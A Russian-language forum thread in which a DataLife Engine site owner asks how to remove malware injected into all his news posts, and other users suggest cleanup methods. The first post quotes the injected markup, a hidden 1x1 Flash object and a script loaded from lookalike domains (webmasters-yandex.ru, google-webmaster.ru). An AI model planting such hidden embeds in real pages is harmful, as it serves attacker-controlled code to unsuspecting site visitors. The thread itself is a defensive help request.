Помощь Удаление вируса

Тема в разделе "DLE", создана пользователем red_devil_tlt, 18 сен 2013.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 11.1 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Модераторы: killoff
  1. red_devil_tlt

    red_devil_tlt Постоялец

    Регистр.:
    5 фев 2008
    Сообщения:
    91
    Симпатии:
    69
    В общем яндекс прислал письмо что на сайте обнаружен вирус. Начал искать и нашел.

    В каждой новости, в кратком и полном описаниях после текста добавлено следующее:

    [​IMG]


    Код:
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?ХХХХХХХХХХХХХХХХХХХХХХХ"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?ХХХХХХХХХХХХХХХХХХХХХХХ" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object><script async="async" type="text/javascript" src="http://google-webmaster.ru/ХХХХХХХХХХХХХХХХХХХХХХХ.js"></script>
    
    где ХХХХХХХХХХХХХХХХХХХХХХХ - разный набор букв и цифр типа 6f3ef77ac0e3619e98159e9b6febf557 или 541668881

    Естественно поменял все пароли как на аккаунт админа, так и на фтп и панель управления и проверил комп касперским. Логи отключены.

    Так как новостей много, то вручную замучаешься удалять этот текст, потому что везде разный набор букв и цифр из каждой новости.


    Подскажите как удалить этот текст?

    Например, через запрос в MySQL или подскажите программку для замены текста где, к примеру, указать * (звездочку) вместо этого набора букв и цифр и полувчилось всё лишнее удалить


    Версия DLE: 9.8 (nulled MID TEAM)
     
  2. OTM

    OTM Создатель

    Регистр.:
    1 май 2012
    Сообщения:
    37
    Симпатии:
    16
    попробуй html changer. Если количество символов одинаковое - можно и вордом
     
  3. Горбушка

    Горбушка Ищу её...

    Регистр.:
    2 май 2008
    Сообщения:
    3.116
    Симпатии:
    2.131
    В ДЛЕ есть специальный пункт - Поиск и замена. Вводишь что заменить и на что заменить - во всех новостях вирус будет удалён. Опять же, если код везде одинаковый.

    Так же не забываем воспользоваться антивирусом и найти в каком файле сидит пакость, отвечающая за добавление вируса в код новостей.
     
  4. red_devil_tlt

    red_devil_tlt Постоялец

    Регистр.:
    5 фев 2008
    Сообщения:
    91
    Симпатии:
    69
    Сейчас еще обнаружил что содержимое некоторых новостей полностью заменено на такой же текст.
    То есть даже если удалять то остануться пустые новости.

    Попрошу хостера восстановить из бекапа всё. и потом буду смотреть
     
  5. artefakt777

    artefakt777

    Регистр.:
    15 июл 2012
    Сообщения:
    468
    Симпатии:
    119
    Чистите и сразу меры принимайте по защите, т.к. практика показывает, что если взломали 1 раз, то обязательно попробуют второй.
     
  6. shellprof

    shellprof Создатель

    Регистр.:
    21 июл 2013
    Сообщения:
    13
    Симпатии:
    1
    На компе Касперский обнаружил что-то?
     
  7. darmoid

    darmoid Киллер

    Регистр.:
    9 мар 2007
    Сообщения:
    372
    Симпатии:
    115
    У меня аналогичная проблема. Вирусов на сайте антивирус не находит. Увидел об этой проблеме, когда в яндекс вебмастере выскочило сообщение: Поведенческий анализ
    Сайт давно заброшен поэтому и не уследил.
    Я для начала сделал по другому. Сменил во всех новостях названия сайтов, прописанных в коде на пробел и подал Яндексу на перепроверку.
    На всякий случай сменил пароли, но я сомневаюсь, что дело в них.
     
  8. Ernest

    Ernest

    Регистр.:
    26 сен 2006
    Сообщения:
    239
    Симпатии:
    58
    Несколько лет назад подхватил вирус на dle, но немного другой там внизу сайта приписывался java скрипт с ссылками, виной всему был фтп командр с вирусней.
     
  9. Bauka

    Bauka Постоялец

    Регистр.:
    17 янв 2013
    Сообщения:
    115
    Симпатии:
    58
    Мое решение:
    Сделайте резервную копию сайта и скачайте. В файлах сайта поищите слово "http://webmasters-yandex.ru/flash.swf" через Notepad ++.
    С помощью этой программы думаю найдете. Скачать можно здесь.
     
  10. Sergo_Sev

    Sergo_Sev Творец

    Регистр.:
    14 июн 2008
    Сообщения:
    571
    Симпатии:
    188
    Вот скрипт - кинуть в корень и запустить
    И всё будет чисто ;)
     

    Вложения:

    • dle_clean.rar
      Размер файла:
      1,6 КБ
      Просмотров:
      26